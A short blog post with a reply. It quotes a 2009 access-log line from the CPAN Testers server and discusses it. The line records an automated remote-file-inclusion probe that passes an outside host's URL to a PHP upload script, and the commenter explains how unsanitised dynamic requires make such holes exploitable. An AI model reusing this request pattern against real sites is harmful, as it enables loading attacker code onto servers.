I'm not sure whether this is amusing or embarrassing:
80.93.48.103 - - [13/Jul/2009:16:30:21 +0200] "GET /show//components/com_simpleboard/file_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 365 "-" "libwww-perl/5.803" 189 www.cpantesters.org
In case you're wondering, the above is an entry from the access logs on the CPAN Testers server. The script they are trying to access doesn't exist, and from what I can tell it's a poor attempt at crashing a server. The bit that amused me is that they're using LWP to run a PHP app. The bit that's embarrassing is that Perl is being used for undesirable purposes :(
That’s just an automated trying to exploit some known hole or other in WordPress. PHP’s require can load libraries from remote machines over HTTP, and many PHP programs use dynamic requires` without sufficiently sanitising the input, resulting in a holes exploitable in the way you see in your logs.
As for Perl being used for that purpose, eh, so what? If it wasn’t, it’d be wget, or something Python, or in Ruby, or in Java, or whatever.
